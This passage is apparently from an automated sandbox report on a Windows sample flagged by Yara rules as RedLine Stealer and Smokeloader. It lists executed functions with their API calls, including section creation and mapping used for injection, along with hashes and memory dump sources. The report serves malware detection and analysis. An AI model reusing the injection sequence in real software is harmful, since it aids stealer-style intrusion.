File size:	305'152 bytes
MD5 hash:	EE4E08FEBD22E594C7BCB70EA1B0252A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.4450918361.0000000004136000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.4451244629.0000000005C60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	18.2%
Signature Coverage:	29%
Total number of Nodes:	269
Total number of Limit Nodes:	10

Executed Functions

Function 004013ED Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 310
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8

Strings

w, xrefs: 00401496

Memory Dump Source

Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd

Similarity

API ID: CreateDuplicateObjectSection
String ID: w
API String ID: 3132048701-476252946
Opcode ID: 300c2ecdd27e888ad78f13685a5e317154d6974f2db9774834ff63eb7b9d584a
Instruction ID: d66d783c96bdfa6dca3d1fe6600e499103a6ed67321a36542f9bdd634b40576e
Opcode Fuzzy Hash: 300c2ecdd27e888ad78f13685a5e317154d6974f2db9774834ff63eb7b9d584a
Instruction Fuzzy Hash: A0A11571904204EBEB209FA5CC44FAB7BB8FF81740F24413AF912BA2E1D7749906CB56

Uniqueness

Uniqueness Score: -1.00%

Function 004014E2 Relevance: 10.7, APIs: 7, Instructions: 183
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD

Memory Dump Source

Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 7299a8bd44a0f09a9814cad8d1b839903cf1e6b88029ded735f1f7f3eb76a162
Instruction ID: 54f816a1873a7b3c05ae102fbfa0db20c4fddfd22ceccde8511ae2322fd00f16
Opcode Fuzzy Hash: 7299a8bd44a0f09a9814cad8d1b839903cf1e6b88029ded735f1f7f3eb76a162
Instruction Fuzzy Hash: ED514B71900204BBEB209F91CC49FEFBBB8FF85B00F10412AF912BA2E4D6759905CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004014ED Relevance: 10.7, APIs: 7, Instructions: 182
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD

Memory Dump Source

Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: f8cd90a01b8841fab90bd03913f1d260bde8b9aa0dc8a539f499ff1e16c1cfe2
Instruction ID: d78456e69b9ee3bedd10ceae2949c316c70905ac9deb4f17dd21856c0d7271cf
Opcode Fuzzy Hash: f8cd90a01b8841fab90bd03913f1d260bde8b9aa0dc8a539f499ff1e16c1cfe2
Instruction Fuzzy Hash: 785139B1900209BFEB209F91CC48FEFBBB8EF85B04F144529F911BA2A5D6759945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401507 Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD

Memory Dump Source

Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 9da137313ded7fbbc6789e5bb01359d8fcafad73d8b78d10eab5d550d18b9b7c
Instruction ID: 2f2d373c220c5723e0f020d1249cf16f546f345e4a7fd1e76d53166f9789eae4
Opcode Fuzzy Hash: 9da137313ded7fbbc6789e5bb01359d8fcafad73d8b78d10eab5d550d18b9b7c
Instruction Fuzzy Hash: CC5138B1900245BFEB209F92CC48FEFBBB8EF85B00F104129F911BA2E5D6719905CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401518 Relevance: 10.7, APIs: 7, Instructions: 171
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD

Memory Dump Source

Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: f5e5914faca7036a9f2b2587145b32dc03ad0df06ff91578a14921ad59b994f8
Instruction ID: 96445da88c21ac9a18ba7f06942a5f985ee594873a048ae4082ffef3eedc30ed
Opcode Fuzzy Hash: f5e5914faca7036a9f2b2587145b32dc03ad0df06ff91578a14921ad59b994f8
Instruction Fuzzy Hash: 765128B1900245BBEB209F92CC48FEFBBB8EF85B04F104529F911BA2E5D6759945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040151C Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD

Memory Dump Source

Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: b3713ec08c7e04deb5c7f374484dc3bee9c28c2fff0b887679791a55d8476689
Instruction ID: bb4afbbbce9fe7f1faeb83e027975ebaba5635be540f9387007d6567f38c581b
Opcode Fuzzy Hash: b3713ec08c7e04deb5c7f374484dc3bee9c28c2fff0b887679791a55d8476689
Instruction Fuzzy Hash: 885119B1900245BFEF209F92CC48FDFBBB8FF85B14F144129F911AA2A5D6719945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0434B756 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0434B77E
Module32First.KERNEL32(00000000,00000224), ref: 0434B79E

Memory Dump Source

Source File: 00000000.00000002.2059007895.0000000004344000.00000040.00000020.00020000.00000000.sdmp, Offset: 04344000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4344000_rBwTlpgnjc.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 58e1f88ce6ce8d46c5bad3f1ce4aa3dcde2e782d0fff3dd74ead119b6bfed478
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 29F06235500710AFE7203AB598CDBAEBAE8EF89625F101628E642914C0DA70F8458A61

Uniqueness

Uniqueness Score: -1.00%

Function 0413003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0413024D

Strings

cess, xrefs: 0413018D
kernel32.dll, xrefs: 0413008F, 04130095

Memory Dump Source

Source File: 00000000.00000002.2058699871.0000000004130000.00000040.00001000.00020000.00000000.sdmp, Offset: 04130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4130000_rBwTlpgnjc.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 713d33ce624b40996217dce17fe4c48372859923d3cd94986ae5f326b4b3e256
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 2E528974A00229DFDB64CF58C984BACBBB1BF09305F1480E9E94DAB355DB30AA85DF14

Uniqueness

Uniqueness Score: -1.00%

Function 0040D47B Relevance: 3.0, APIs: 2, Instructions: 30
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,?,?,?,?,?,00000000,00000000,00000000,?,0040CC7E,?,?,00000000,?,00000000), ref: 0040D4A2
LCMapStringW.KERNEL32(00000000,?,?,?,?,?,?,0040CC7E,?,?,00000000,?,00000000,00000000), ref: 0040D4BF

Memory Dump Source

Source File: 00000000.00000002.2056595034.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_rBwTlpgnjc.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 2ae232fb656378ce483d58b65c5ffb3af57457b4fba3747539c215fd1d4e99ef
Instruction ID: 570daf4adb4621a24a7f0c796f3d6176889b68d62c2a7a6e92a15093398afc95
Opcode Fuzzy Hash: 2ae232fb656378ce483d58b65c5ffb3af57457b4fba3747539c215fd1d4e99ef
Instruction Fuzzy Hash: 74F01F72010109BFDF069FD4ED0ACEB3B6AFB48354B048429FA1855061D776A971AB95

Uniqueness

Uniqueness Score: -1.00%

Function 04130E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,04130223,?,?), ref: 04130E19
SetErrorMode.KERNELBASE(00000000,?,?,04130223,?,?), ref: 04130E1E

Memory Dump Source

Source File: 00000000.00000002.2058699871.0000000004130000.00000040.00001000.00020000.00000000.sdmp, Offset: 04130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4130000_rBwTlpgnjc.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: fee6a9d0514fcff8610eef6c0e82d5d193ba1d54c18d389b9efd760a7b657380
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: EED0123124512877D7003A94DC09BCD7F5CDF09B63F008061FB0DD9080C770954046E5

Uniqueness

Uniqueness Score: -1.00%

Function 004018C3 Relevance: 1.3, APIs: 1, Instructions: 66
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000DE), ref: 00401919

Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8

Memory Dump Source

Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 20e0d23e55f5860cd765092bcd1a4803eab56b051b47866fb1db2e929ae757d2
Instruction ID: 53cc65aa0172f3087033d362448bdc94b21a8511efdb665d8b99a9a355c9eb06
Opcode Fuzzy Hash: 20e0d23e55f5860cd765092bcd1a4803eab56b051b47866fb1db2e929ae757d2
Instruction Fuzzy Hash: 5B114FB220C205EBD6006A949D92E6A3668AB01754F308137BA477A1F0D17D9A53F76B

Uniqueness

Uniqueness Score: -1.00%

Function 004018CE Relevance: 1.3, APIs: 1, Instructions: 60
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000DE), ref: 00401919

Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8

Memory Dump Source

Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 7169d427e5ce931a1b0669115664685f1c376e8f9b84ee4d7b06600fb2b6ce55
Instruction ID: c74ef3fd805783007b5872fe690244dae77f590db066df4350d3399cd1107ce2
Opcode Fuzzy Hash: 7169d427e5ce931a1b0669115664685f1c376e8f9b84ee4d7b06600fb2b6ce55
Instruction Fuzzy Hash: A211E9B2208205EBDB006BA0CC92FA93764AF01710F244177F6577A0F1D67D9A13EB1B

Uniqueness

Uniqueness Score: -1.00%

Function 004018ED Relevance: 1.3, APIs: 1, Instructions: 54
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000DE), ref: 00401919

Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8

Memory Dump Source

Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 06fc01ff54c1de9d0546f325fd6eb32fa967447e89cf10e9bb9eeb484df65950
Instruction ID: 5192c5fd7ad846daa7d68e837b6c6d3e663b4b5ca2644085206a245cacfb9c55
Opcode Fuzzy Hash: 06fc01ff54c1de9d0546f325fd6eb32fa967447e89cf10e9bb9eeb484df65950
Instruction Fuzzy Hash: C80152B2208205EBDB006AD09D91F6A3364AF01714F308137BA17790F1D67D9A53F71B

Uniqueness

Uniqueness Score: -1.00%

Function 004018F4 Relevance: 1.3, APIs: 1, Instructions: 51
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000DE), ref: 00401919

Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8

Memory Dump Source

Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: aba4ed6962655fa9e58d9b243404d4cd8fbb99be38422038cecd155628e1f565
Instruction ID: 6301a06c588b47d17a354cf59e3a00cdfa51c18b5066a88522684ebbc7f3c5b3
Opcode Fuzzy Hash: aba4ed6962655fa9e58d9b243404d4cd8fbb99be38422038cecd155628e1f565
Instruction Fuzzy Hash: 3C0175B1248105EBDB006AE49D91FAE33546F05714F204133FA577A1F1D27D9913E76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401907 Relevance: 1.3, APIs: 1, Instructions: 49
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000DE), ref: 00401919

Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8

Memory Dump Source

Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 621ccd25a172018797ce6621ebc33c4937c50a7202d72714c7e14af9fbaf8c42
Instruction ID: ddfa02207d2976e6176cbc7aeabde5bcf8e04bb4bd45437ba787a0bf3f4ebc64
Opcode Fuzzy Hash: 621ccd25a172018797ce6621ebc33c4937c50a7202d72714c7e14af9fbaf8c42
Instruction Fuzzy Hash: D10171B1208205EBDB006AE4DD91F6A3364AF05714F204137FA577A0F0C27E9A53E72B

Uniqueness

Uniqueness Score: -1.00%

Function 0434B415 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0434B466

Memory Dump Source

Source File: 00000000.00000002.2059007895.0000000004344000.00000040.00000020.00020000.00000000.sdmp, Offset: 04344000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4344000_rBwTlpgnjc.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 991237fe609061ee5b8d2eb8bcfc395a16ea8c3d0947fb36a4df3e3e041b78c6
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 38112B79A00208EFDB01DF98C985E98BBF5AF08350F158094FA489B361D375EA50EF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0413092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 041309DC, 041309DF, 041309E4
., xrefs: 0413095F
l, xrefs: 04130966

Memory Dump Source

Source File: 00000000.00000002.2058699871.0000000004130000.00000040.00001000.00020000.00000000.sdmp, Offset: 04130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4130000_rBwTlpgnjc.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 6140067ffa0b4a676e81550f86790db8153e368fede1e0cef19aaed83ac02889
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 503139B6900609DFEB10CF99C880BAEBBF5FF48329F15408AD545AB214D771FA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004013EC Relevance: 1.3, Strings: 1, Instructions: 81nativeCOMMON

Download Yara Rule

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8

Strings

w, xrefs: 00401496

Memory Dump Source

Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd

Similarity

API ID: CreateDuplicateObjectSection
String ID: w
API String ID: 3132048701-476252946
Opcode ID: 5307f634e3a506ea2320f5743c53b9c3ec9651771174e14a08c9c248aa8a452e
Instruction ID: 21e26b27f840a71e9c2479f5824e9a5b58214ec678355e1b3ba33bd2b697900d
Opcode Fuzzy Hash: 5307f634e3a506ea2320f5743c53b9c3ec9651771174e14a08c9c248aa8a452e
Instruction Fuzzy Hash: 31216BB1908288D7E7229A75C08029A7B91BF513D4F7900BFD4916B2B3D7798447974B

Uniqueness

Uniqueness Score: -1.00%

Function 004013F9 Relevance: 1.3, Strings: 1, Instructions: 77nativeCOMMON

Download Yara Rule

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8

Strings

w, xrefs: 00401496

Memory Dump Source

Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd

Similarity

API ID: CreateDuplicateObjectSection
String ID: w
API String ID: 3132048701-476252946
Opcode ID: 3d164c9caefbd0c79770c83873e083ac9f272dbc2fb0f5ee021208258e87fe5c
Instruction ID: 3ce6a916d8d01e929893c0d83df2441c47a9e6de1688a554765366bcd4a56753
Opcode Fuzzy Hash: 3d164c9caefbd0c79770c83873e083ac9f272dbc2fb0f5ee021208258e87fe5c
Instruction Fuzzy Hash: 25219DA2D09284DBE722AB75C08029A7B90BF513D4B7900FFD0906B2B7E739C457C789

Uniqueness

Uniqueness Score: -1.00%

Function 0040141C Relevance: 1.3, Strings: 1, Instructions: 68nativeCOMMON

Download Yara Rule

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8

Strings

w, xrefs: 00401496

Memory Dump Source

Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd

Similarity

API ID: CreateDuplicateObjectSection
String ID: w
API String ID: 3132048701-476252946
Opcode ID: 9f8fa575fc4a76ac03b320a7d3feff316ede3eb2f157533e03b1c81068af3e11
Instruction ID: e2385927b4e27c6bf3e150a27e60e2e72ca91b290c02674fa8b867697a20b252
Opcode Fuzzy Hash: 9f8fa575fc4a76ac03b320a7d3feff316ede3eb2f157533e03b1c81068af3e11
Instruction Fuzzy Hash: 07218BA2D04189D7E722AB74C08038ABB91BF523E4F7A00BFD0946B277E7798447C785

Uniqueness

Uniqueness Score: -1.00%

Function 0040142C Relevance: 1.3, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

w, xrefs: 00401496

Memory Dump Source

Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd

Similarity

API ID:
String ID: w
API String ID: 0-476252946
Opcode ID: d9751c7a0d5efc3d13f605be65c5fd372a0dbed2bb38e09722ca5738afb953d9
Instruction ID: 901ca8bb586433f8fc6d7141f8d27aeeb597132328b78f02a134cd28ca5d0fb1
Opcode Fuzzy Hash: d9751c7a0d5efc3d13f605be65c5fd372a0dbed2bb38e09722ca5738afb953d9
Instruction Fuzzy Hash: B6118CE2A042899BE7229B75C08029A7B91FF513E4B7901BFD0905A6B7E779C407C784

Uniqueness

Uniqueness Score: -1.00%

Function 004032D5 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a74ea88b89c3d8a7194aa168887248808e1108a0b707910c5cd6e0e1350db2e
Instruction ID: 0e9ebbcfba286c6ee41e2bde73d6518a855f9b320133d3884c6a40b0f70cde46
Opcode Fuzzy Hash: 0a74ea88b89c3d8a7194aa168887248808e1108a0b707910c5cd6e0e1350db2e
Instruction Fuzzy Hash: EE21046680D2D29FDB164E205CA62617F78962331279912FFC481EA5D3E22C8B07D329

Uniqueness

Uniqueness Score: -1.00%

Function 0434B033 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2059007895.0000000004344000.00000040.00000020.00020000.00000000.sdmp, Offset: 04344000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4344000_rBwTlpgnjc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: b92b00161e4360260388b22276b2102d94f222466df2efa2cbe0f237358fb81f
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: EA117C72340100AFE754DE59DC80EE6B3EAEB89325B198165EE14CB312E776F841C760

Uniqueness

Uniqueness Score: -1.00%

Function 04130D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

